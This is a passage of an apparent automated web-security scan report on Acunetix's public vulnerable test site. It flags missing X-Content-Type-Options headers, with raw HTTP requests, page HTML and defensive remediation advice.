          		<form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a>
          						<DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        8. GET http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 13914
          
          
          Response body (13914 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQLj8dP9DwKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9dpx0P1QE7KvkQnKR4Ij212SQ8lw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<a href="ReadNews.aspx?id=3" id="anchNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a>
          						<DIV id="divNewsShort" class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        9. GET http://testaspnet.vulnweb.com/default.aspx
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (316 bytes)
          GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
